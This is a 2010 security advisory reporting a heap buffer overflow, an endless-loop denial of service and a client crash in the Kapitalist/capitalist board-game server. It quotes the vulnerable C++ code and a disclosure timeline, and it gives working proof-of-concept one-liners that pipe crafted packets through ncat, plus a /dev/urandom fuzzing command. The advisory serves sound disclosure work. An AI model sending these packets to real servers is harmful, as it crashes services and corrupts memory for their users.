GVI-2010-01 Multiple vulnerabilities in Kapitalist/capitalist

Type securityvulns
Reporter Securityvulns
Modified 2010-05-17T00:00:00


GVI-2010-01 : Multiple vulnerabilities in Kapitalist/capitalist


Quote from http://kapitalist.sourceforge.net/ "Kapitalist is a Monopoly®-like board game for 2-8 players. Walk around the board, buy properties, receive rent from your competitors, try to get monopolies to build houses and hotels on them and finally be the richest on the board. "


Two issues were found in capitalist when sending specially crafted packets. One results in heap corruption, the second makes the server enter in an endless loop resulting in a Denial-of-Service.

Additionally, sending a specially crafted packet causes the connected clients to disconnect.


Vulnerable Product : capitalist 0.3.1, Kapitalist 0.4 Vulnerability Type : Buffer overflow, Denial-of-Service Discovered by : Sébastien Duquette (virtualguardian.ca)

Original Advisory : http://www.gardienvirtuel.ca/wp-content/uploads/2010/05/GVI-2010-01-EN.txt


The vendor was contacted but no response was received in a two weeks delay.

Bug Discovered : October 12th, 2009 Vendor Advised : October 14th, 2009 Additional info sent : October 17th, 2009 Vendor Response : October 26th, 2009 Vendor recontacted : February 7th, 2010 Vendor Response : February 14th, 2010 Public Disclosure : May 13th, 2010


When receiving a join game request, capitalist allocates a packet_req_join_game structure on the heap and copies the received data to it. On the last shown line, it copies a string. It does not check however if the string fits in the allocated buffer.

common/packets.cpp, line 432 struct packet_req_join_game * receive_packet_req_join_game(struct connection pc) { unsigned char cptr; struct packet_req_join_game packet= (struct packet_req_join_game ) cap_malloc(sizeof(struct packet_req_join_game));

      cptr=get_int16(pc->buffer.data, NULL);
      cptr=get_int8(cptr, NULL);
      cptr=get_string(cptr, packet->name);

When called, the get_string() method will copy the string and cause a buffer overflow if the string is longer than the allocated size (10 bytes).

common/packets.cpp, line 271 unsigned char get_string(unsigned char buffer, char mystring) { unsigned char c; int len;

      /* avoid using strlen (or strcpy) on an (unsigned char*)  --dwp */
      for(c=buffer; *c; c++) ;
      len = c-buffer+1;
      if(mystring) {
            memcpy(mystring, buffer, len);
      return buffer+len;

Proof of concept

Bug #1: Heap corruption ~~~~~~~~~~~~~~~~~~~~~~~

ruby -e "print 0x00.chr << 0x14 << 0x00 << 'A'*35 << 0x00 " | ncat SERVER 2525

If MALLOC_CHECK_ is enabled, a similar message will be printed : glibc detected /home/ekse/src/capitalist2/bin/capitalist: malloc(): memory corruption: 0x081a7650 ***

Inspecting the memory shows that our packet is the source of the crash: (gdb) x 0x081a7650 0x81a7650: 0x00414141

Bug #2: Endless loop ~~~~~~~~~~~~~~~~~~~~

ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAAAAAAA' << 0x00.chr * 8 << 0x02 << 0x00.chr * 3 << 0x00" | ncat SERVER 2525

Bug #3: Crashing the clients ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAA' << 0x00.chr * 8 << 0x02 << 0x00.chr * 3 << 0x00" | ncat SERVER 2525

After sending this packet, close ncat. The clients will then crash with the following message : kapitalist: kapgame.cpp:239: Player* const KapGame::player(int) const: Assertion `!nobody(id)' failed.

Fun Fact

The flaw in the server was found this way : while true; do cat /dev/urandom | nc 2525


There are currently no fix for these issues. It is recommend not to make servers available on the Internet and accept connections only from trusted sources.